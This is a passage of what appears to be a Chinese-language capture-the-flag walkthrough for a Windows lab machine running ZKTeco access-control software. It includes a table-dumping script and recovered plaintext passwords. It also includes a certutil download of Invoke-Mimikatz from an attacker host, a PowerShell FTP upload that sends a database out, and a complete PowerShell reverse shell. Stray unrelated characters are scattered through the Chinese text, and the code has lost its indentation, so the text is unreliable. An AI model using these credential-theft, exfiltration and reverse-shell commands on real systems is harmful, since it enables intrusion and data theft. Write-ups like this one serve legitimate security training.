Ftp服務(wù)器
2.在kali環(huán)境中,可以利用mdb-tools工具套件來(lái)讀取.mdb文件蝉仇,例如:列出所有的表mdb-export backup.mdb旋讹,這里利用python將數(shù)據(jù)庫(kù)中所有信息導(dǎo)出
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import os
cmd = 'mdb-export backup.mdb '
table = 'acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx'
item_list = table.split(' ')
for item in item_list:
print item
c_cmd = cmd + item
process = os.popen(c_cmd)
output = process.read()
process.close()
table_file = open('backupdb/' + item,'w')
table_file.write(output)
table_file.close()
導(dǎo)出后的數(shù)據(jù)文件形式
3.在auth_user表中可以發(fā)現(xiàn)一組有用的用戶名密碼:engineer access4u@security
auth_user表
4.利用這個(gè)密碼可以去解密剛下載的壓縮包,壓縮包里是一個(gè).pst郵件格式文件轿衔,如果安裝了outlook可以很容易的打開(kāi)沉迹,如果沒(méi)有可以在kali中安裝evolution和evolution-plugins,readpst "Access Control.pst" 轉(zhuǎn)換pst為mbox文件害驹,mail -f "Access Control" 查看mbox文件鞭呕。在郵件中保存有另一組登錄帳號(hào):security 4Cc3ssC0ntr0ller,這組賬號(hào)可供telnet登錄使用裙秋。
郵件內(nèi)容
5.telnet登錄后在security的桌面拿下user.txt
telnet登錄
6.繼續(xù)滲透會(huì)發(fā)現(xiàn)服務(wù)器禁止了.exe程序的執(zhí)行琅拌,只能執(zhí)行部分系統(tǒng)指令,powershell是唯一可能的突破口摘刑,但同樣對(duì)運(yùn)行權(quán)限做了限制进宝,常用的Set-ExecutionPolicy Unrestricted限制繞過(guò)等指令都需要管理員權(quán)限。在當(dāng)前環(huán)境中可以用以下命令進(jìn)行上傳枷恕,下載党晋。下載功能是系統(tǒng)自帶,上傳需要用到ps1腳本徐块,在kali中我搭建了ftp用于接收文件未玻,雖然對(duì)本題并不能拿到線索,但也留個(gè)備份胡控,以后可能用到扳剿。
windows自帶下載命令:certutil -urlcache -split -f http://10.10.14.5/Invoke-Mimikatz.ps1
普通用戶執(zhí)行腳本:powershell -ExecutionPolicy ByPass -File new.ps1
#以下為Ftp上傳腳本PS1#
$ftp="ftp://10.10.14.5"
$user="root"
$pass="123456"
$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
$name="Access.mdb"
$uri = New-Object System.Uri($ftp+"/"+$name+"")
$webclient.UploadFile($uri,"C:/ZKTeco/ZKAccess3.5/Access.mdb")
runas參數(shù)
#以下是new.ps1反彈腳本#
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.5",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
root.txt
